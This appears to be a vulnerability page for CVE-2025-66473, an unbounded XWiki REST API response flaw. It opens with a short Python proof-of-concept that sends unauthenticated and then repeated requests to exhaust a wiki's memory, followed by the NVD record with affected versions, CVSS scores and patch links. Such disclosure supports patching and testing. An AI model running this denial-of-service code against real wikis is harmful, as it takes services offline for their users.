CVE-2025-66473

import requests import time # CVE-2025-66473 PoC - XWiki REST API DoS # Target: XWiki instances with unpatched REST API target_url = "http://target-server:8080/xwiki/rest/wikis/xwiki/spaces" headers = { "User-Agent": "Mozilla/5.0 (compatible; CVE-2025-66473-PoC)", "Accept": "application/json" } print("[*] Sending request to trigger CVE-2025-66473...") print(f"[*] Target: {target_url}") try: # This request will attempt to retrieve ALL spaces/pages # causing memory exhaustion on large wikis response = requests.get(target_url, headers=headers, timeout=30) print(f"[+] Response Status: {response.status_code}") print(f"[+] Response Size: {len(response.content)} bytes") if response.status_code == 200: data = response.json() print(f"[!] Retrieved {len(data.get('spaces', []))} spaces") print("[!] Vulnerability confirmed - no pagination limit enforced") except requests.exceptions.Timeout: print("[!] Request timed out - possible DoS condition triggered") except Exception as e: print(f"[-] Error: {str(e)}") # Alternative: Multiple concurrent requests for amplified effect print("\n[*] Testing concurrent request amplification...") for i in range(5): requests.get(target_url, headers=headers, timeout=60) print(f"[*] Sent request {i+1}/5")

{"cve": {"id": "CVE-2025-66473", "sourceIdentifier": "[email protected]", "published": "2025-12-10T22:16:27.850", "lastModified": "2025-12-19T17:14:44.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "XWiki is an open-source wiki software platform. Versions 16.10.10 and below, 17.0.0-rc-1 through 17.4.3 and 17.5.0-rc-1 through 17.6.0 contain a REST API which doesn't enforce any limits for the number of items that can be requested in a single request at the moment. Depending on the number of pages in the wiki and the memory configuration, this can lead to slowness and unavailability of the wiki. As an example, the /rest/wikis/xwiki/spaces resource returns all spaces on the wiki by default, which are basically all pages. This issue is fixed in versions 17.4.4 and 16.10.11."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.10.11", "matchCriteriaId": "FCDB8F94-5FBD-4A22-A417-54E965A9836F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.0.0", "versionEndExcluding": "17.4.4", "matchCriteriaId": "10175AF0-04B1-4BE0-9657-532EEC0AB6A9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*", "versionStartIncluding": "17.5.0", "versionEndIncluding": "17.6.0", "matchCriteriaId": "649548AF-281D-4CD9-9672-7BB8F25BEF12"}]}]}], "references": [{"url": "https://github.com/xwiki/xwiki-platform/commit/e3c47745195fb445b054537be86f5c01ee69558b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-cc84-q3v3-mhgf", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XWIKI-23355", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "https://jira.xwiki.org/browse/XWIKI-23355", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Patch", "Vendor Advisory"]}]}}